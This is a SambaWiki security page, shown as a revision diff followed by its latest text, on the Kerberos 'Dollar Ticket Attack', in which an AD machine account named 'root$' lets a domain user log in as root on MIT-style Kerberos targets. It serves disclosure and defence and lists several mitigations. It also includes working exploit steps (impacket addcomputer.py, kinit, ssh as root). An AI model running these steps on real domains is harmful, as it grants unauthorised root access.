Difference between revisions of "Security/Dollar Ticket Attack"

From SambaWiki
(clients -> targets)
 
(6 intermediate revisions by 2 users not shown)
Line 1: Line 1:
 
=The "Dollar Ticket Attack" / Name confusion in Kerberos=
 
=The "Dollar Ticket Attack" / Name confusion in Kerberos=
   
This page attempts to document the "Dollar Ticket Attack" on Active Directory servers and clients.
+
This page attempts to document the "Dollar Ticket Attack" on Active Directory servers and targets (Kerberos enabled services).
   
 
Many of these attacks are worse in Windows domains as [https://www.netspi.com/blog/technical/network-penetration-testing/machineaccountquota-is-useful-sometimes/ MachineAccountQuota] is still enabled by default.
 
Many of these attacks are worse in Windows domains as [https://www.netspi.com/blog/technical/network-penetration-testing/machineaccountquota-is-useful-sometimes/ MachineAccountQuota] is still enabled by default.
Line 35: Line 35:
 
* [https://exploit.ph/cve-2021-42287-cve-2021-42278-weaponisation.html Research]
 
* [https://exploit.ph/cve-2021-42287-cve-2021-42278-weaponisation.html Research]
   
=Still Open Issue in 'MIT Style' clients: =
+
=Still Open Issue in 'MIT Style' targets (Kerberos enabled services): =
   
For many 'MIT style' clients, it is trivial for a domain user to become root or another local privileged user.
+
For many 'MIT style' targets, it is trivial for a domain user to become root or another local privileged user.
   
 
==Fallback to 'bare' users==
 
==Fallback to 'bare' users==
Line 72: Line 72:
   
 
* Fedora 36 client
 
* Fedora 36 client
** python3-impackt and krb5-workstation packages installed
+
** python3-impacket and krb5-workstation packages installed
   
 
* Fedora 36 target
 
* Fedora 36 target
Line 116: Line 116:
   
 
SSSD 2.7 and later has added a way to check PAC presence and validity of certain fields inside PAC structure. If all users in your deployment get PAC issued (standard for AD), enabling PAC checks should mitigate the issues. See '''sssd.conf(5)''' manual page for the option '''pac_check'''. SSSD AD provider defaults to '''check_upn, check_upn_dns_info_ex''', adding '''pac_present''' will force PAC.
 
SSSD 2.7 and later has added a way to check PAC presence and validity of certain fields inside PAC structure. If all users in your deployment get PAC issued (standard for AD), enabling PAC checks should mitigate the issues. See '''sssd.conf(5)''' manual page for the option '''pac_check'''. SSSD AD provider defaults to '''check_upn, check_upn_dns_info_ex''', adding '''pac_present''' will force PAC.
  +
  +
For full PAC checks when Dollar Ticket Attack mitigations applied at AD side, use '''pac_check = pac_present, upn_dns_info_ex_present''' which will deny any tickets that do not have PAC structures and even if PAC exists, UPN-DNS-INFO structure content must be consistent with the rest of the PAC and the ticket.
  +
  +
==MIT Kerberos==
  +
  +
It is recommended to have only a single auth to local name translation plugin enabled. SSSD and winbindd both enable own translation plugins but don't disable the default one. Thus, disabling a default one in case SSSD or winbindd's plugins are in use can help to mitigate the problem if no other user mapping is expected. This can only be recommended for pure AD environment because it could break classic Kerberos setup that expects mapping Kerberos principals to non-REALM-based POSIX user names.
  +
  +
Disabling a default plugin can be done with the following snippet. On Fedora and RHEL systems the snippet can be added to '''/etc/krb5.conf.d/''' directory in its own configuration file (as a '''disable-localauth.conf''', for example):
  +
  +
[plugins]
  +
localauth = {
  +
disable = an2ln
  +
}
  +
  +
==General OpenSSH configuration==
  +
  +
One simple change is to not allow '''root''' login at all for OpenSSH server:
  +
  +
PermitRootLogin no
  +
  +
This would prevent any type of authentication as root for OpenSSH server. Users still would be able to perform '''sudo''', if configured, but they'd have to login as normal users first.

Latest revision as of 22:20, 14 July 2022

The "Dollar Ticket Attack" / Name confusion in Kerberos

This page attempts to document the "Dollar Ticket Attack" on Active Directory servers and targets (Kerberos enabled services).

Many of these attacks are worse in Windows domains as MachineAccountQuota is still enabled by default.

CVEs and Announcements of the Nov 2021 issues

Talks

Blogs

Documentation

Still Open Issue in 'MIT Style' targets (Kerberos enabled services):

For many 'MIT style' targets, it is trivial for a domain user to become root or another local privileged user.

Fallback to 'bare' users

Just as Samba saw with CVE-2020-25717, the default principal to username mapping in MIT Kerberos is unsafe if user creation on the realm is not privileged.

Even if (eg) sssd or Samba provides a more complex account to local name plugin, the default behaviour remains to to map a user in the default realm to the matching user locally. It helps to avoid (eg) sssd mapping to an unprivileged account if that account is taken away before the ticket is presented.

The [https://web.mit.edu/kerberos/krb5-1.20/doc/admin/host_config.html MIT Kerberos Host configuration documentation describes the defaults as:

[realms]
   DEFAULT.REALM = {
...
       # Also allow principals from the default realm.  Omit this line
       # to only allow access to principals in OTHER.REALM.
       auth_to_local = DEFAULT
   }


MIT-style servers don't know a $ is missing

Unless the MIT-style kerberos acceptor enforces the presence of the PAC, and can read the PAC, using the extra information provided by Windows and Samba, it is not possible to know that the username has been stripped of the trailing $. This allows more opportunity for attack as there is no need for permission to delete the account, and still operates after Machine Accounts were restricted to keeping their trailing $

Impact

A user able to create an account 'root$' in AD, via MachineAccountQuota, can present a ticket to the target as 'root' and access (eg) SSH as root in default domain-joined machines using SSSD and 'realm', plus many similar and simpler custom per-deployment configurations.

Exploit steps

Environment

  • Windows 2022 (fully patched) AD DC
    • with Certificate services for LDAPS support
  • Fedora 36 client
    • python3-impacket and krb5-workstation packages installed
  • Fedora 36 target
    • Root account enabled at install
    • joined to the AD domain
    • realm join -U administrator win22.example.com –computer-name=fedora

Steps

kinit andrew

addcomputer.py -debug -k -dc-host abartlet-dc-win-22.win22.example.com WIN22.EXAMPLE.COM/andrew -method LDAPS -computer-name root

kinit root

ssh -v -o PreferredAuthentications=gssapi-with-mic -l root fedora

Other related issues

There are many other security issues, some related, that come form the same tree, including:

Mitigations

MachineAccountQuota is evil (only on Windows AD, unimplemented on Samba)

Control MachineAccountQuota by changing

ms-DS-MachineAccountQuota

to 0. This attribute is in the base domain DN, eg

dc=domain,dc=com

or using Group Policies to assign the SeMachineAccountPrivilege to a more restricted set of users (not 'Authenticated Users').

Block creation of sensitive users

It would be prudent to pre-create disabled users in Active Directory matching on all privileged names not held in Active Directory, eg

samba-tool user add root -H ldap://$SERVER -U$USERNAME%$PASSWORD --random-password
samba-tool user add ubuntu -H ldap://$SERVER -U$USERNAME%$PASSWORD --random-password
...

(repeat for eg all system users under 1000 in /etc/passwd or special to any other AD-connected services, eg perhaps "admin" for a web-app)

SSSD 2.7 and later

SSSD 2.7 and later has added a way to check PAC presence and validity of certain fields inside PAC structure. If all users in your deployment get PAC issued (standard for AD), enabling PAC checks should mitigate the issues. See sssd.conf(5) manual page for the option pac_check. SSSD AD provider defaults to check_upn, check_upn_dns_info_ex, adding pac_present will force PAC.

For full PAC checks when Dollar Ticket Attack mitigations applied at AD side, use pac_check = pac_present, upn_dns_info_ex_present which will deny any tickets that do not have PAC structures and even if PAC exists, UPN-DNS-INFO structure content must be consistent with the rest of the PAC and the ticket.

MIT Kerberos

It is recommended to have only a single auth to local name translation plugin enabled. SSSD and winbindd both enable own translation plugins but don't disable the default one. Thus, disabling a default one in case SSSD or winbindd's plugins are in use can help to mitigate the problem if no other user mapping is expected. This can only be recommended for pure AD environment because it could break classic Kerberos setup that expects mapping Kerberos principals to non-REALM-based POSIX user names.

Disabling a default plugin can be done with the following snippet. On Fedora and RHEL systems the snippet can be added to /etc/krb5.conf.d/ directory in its own configuration file (as a disable-localauth.conf, for example):

 [plugins]
  localauth = {
     disable = an2ln
  }

General OpenSSH configuration

One simple change is to not allow root login at all for OpenSSH server:

 PermitRootLogin no

This would prevent any type of authentication as root for OpenSSH server. Users still would be able to perform sudo, if configured, but they'd have to login as normal users first.